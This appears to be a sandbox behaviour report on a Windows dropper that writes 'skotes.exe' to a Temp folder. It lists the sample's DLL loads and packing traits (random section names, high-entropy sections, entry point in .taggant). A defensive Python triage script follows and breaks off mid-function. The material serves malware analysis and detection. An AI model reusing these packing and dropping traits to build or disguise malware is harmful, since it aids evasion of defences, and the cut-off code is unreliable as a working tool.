Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2228 -parentBuildID 20230927232528 -prefsHandle 2152 -prefMapHandle 2132 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c6f543-2f64-46ba-bc00-280bf6150280} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8a5f6cf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1136 -parentBuildID 20230927232528 -prefsHandle 4464 -prefMapHandle 4460 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e04a16-f2f3-4c95-9817-ee287afde24a} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b8c3fb10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3164 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5300 -prefMapHandle 3188 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f24f9574-f2ff-4886-877e-c3019b1407de} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b74c0910 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6812 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6864 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6896 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6812 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7660 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7708 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Google Drive.lnk.9.dr, YouTube.lnk.9.dr, Sheets.lnk.9.dr, Gmail.lnk.9.dr, Slides.lnk.9.dr, Docs.lnk.9.dr LNK file target: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: file.exe Static file information: File size 1921024 > 1048576
Source: file.exe Static PE information: Raw size of section dkmnrssd (0x1a3400) exceeds 0x100000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkmnrssd:EW;tqafgssw:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: header CheckSum 0x1d9e2d does not match the computed value 0x1e3ff7
Source: skotes.exe.0.dr Static PE information: header CheckSum 0x1d9e2d does not match the computed value 0x1e3ff7
Source: file.exe Static PE information: section names (in order): (blank), .idata, (blank), dkmnrssd, tqafgssw, .taggant
Source: skotes.exe.0.dr Static PE information: section names (in order): (blank), .idata, (blank), dkmnrssd, tqafgssw, .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EDD91C push ecx; ret 6_2_00EDD92F
Source: file.exe Static PE information: section name: (blank) entropy: 7.985416397888055
Source: file.exe Static PE information: section name: dkmnrssd entropy: 7.954101495285281
Source: skotes.exe.0.dr Static PE information: section name: (blank) entropy: 7.985416397888055
Source: skotes.exe.0.dr Static PE information: section name: dkmnrssd entropy: 7.954101495285281
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
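The packer signals listed above (blank and random-looking section names, a section of near-random bytes, an entry point inside .taggant, and a stored CheckSum that disagrees with the file) can be reproduced offline with a small static check. The following Python is an added example written for this page; it is not sandbox tooling and not code from the sample. It uses only the standard library and handles PE32 images only. The KNOWN_SECTIONS list, the 7.0-bit entropy threshold and the constructed build_sample() layout are assumptions chosen to mirror the table above, not data taken from file.exe.

```python
"""Static PE triage for the packer signals listed under Data Obfuscation above: blank
or unfamiliar section names, a near-random section, an entry point outside the code
section and a header CheckSum that disagrees with the file. Stdlib only, PE32 only."""
import hashlib
import math
import struct

KNOWN_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc", ".reloc", ".bss",
                  ".tls", ".CRT", ".gfids", ".xdata", ".didat", ".00cfg", ".textbss", ".ndata", "CODE", "DATA", "BSS"}
CODE_SECTIONS = {".text", "CODE", ".textbss"}   # where a normal linker puts the entry point


def parse_pe(data):
    """Entry point RVA, stored CheckSum, its file offset and the section table (PE32)."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw": data[rptr:rptr + rsize]})
    return {"entry": struct.unpack_from("<I", data, opt + 16)[0], "checksum_off": opt + 64,
            "checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": sections}


def shannon_entropy(buf):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)


def pe_checksum(data, checksum_off):
    """CheckSum as CheckSumMappedFile computes it: dword sum with end-around carry over
    the whole file (the CheckSum field skipped), folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_off:        # assumes the field is dword aligned, as in real images
            total += struct.unpack_from("<I", padded, off)[0]
            if total >= 1 << 32:
                total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)


def fix_checksum(data):
    # Copy of the image with a correct CheckSum; shows the computation round-trips.
    off = parse_pe(data)["checksum_off"]
    buf = bytearray(data)
    struct.pack_into("<I", buf, off, pe_checksum(data, off))
    return bytes(buf)


def triage(data, entropy_threshold=7.0):
    info = parse_pe(data)
    report = {"blank_names": 0, "unfamiliar_names": [], "high_entropy": [], "entry_section": None}
    for idx, s in enumerate(info["sections"]):
        if not s["name"]:
            report["blank_names"] += 1
        elif s["name"] not in KNOWN_SECTIONS:
            report["unfamiliar_names"].append(s["name"])
        ent = shannon_entropy(s["raw"])
        if ent >= entropy_threshold:
            report["high_entropy"].append((idx, s["name"], round(ent, 3)))
        if s["va"] <= info["entry"] < s["va"] + max(s["vsize"], len(s["raw"])):
            report["entry_section"] = s["name"]
    report["entry_outside_code"] = report["entry_section"] not in CODE_SECTIONS
    # A zero CheckSum is normal for unsigned user-mode binaries; only a non-zero value
    # that disagrees with the file points at tampering or a careless packer.
    report["checksum_ok"] = (None if info["checksum"] == 0
                             else info["checksum"] == pe_checksum(data, info["checksum_off"]))
    return report


def build_sample():
    """Constructed PE32 copying this report's section layout (two blank names, .idata,
    dkmnrssd, tqafgssw, entry point in .taggant); it is not the analysed sample."""
    noise = lambda n: b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n // 32))
    layout = [("", b"\0" * 0x200), (".idata", b"A" * 0x200), ("", b"\0" * 0x200),
              ("dkmnrssd", noise(0x1000)), ("tqafgssw", b"\x90" * 0x200), (".taggant", b"\xCC" * 0x200)]
    va, rptr, entry, sec_hdrs, raw = 0x1000, 0x400, 0, b"", b""
    for name, blob in layout:
        entry = va + 0x10 if name == ".taggant" else entry
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(blob), va, len(blob), rptr, 0, 0, 0, 0, 0x60000020)
        raw, rptr, va = raw + blob, rptr + len(blob), va + ((len(blob) + 0xFFF) & ~0xFFF)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
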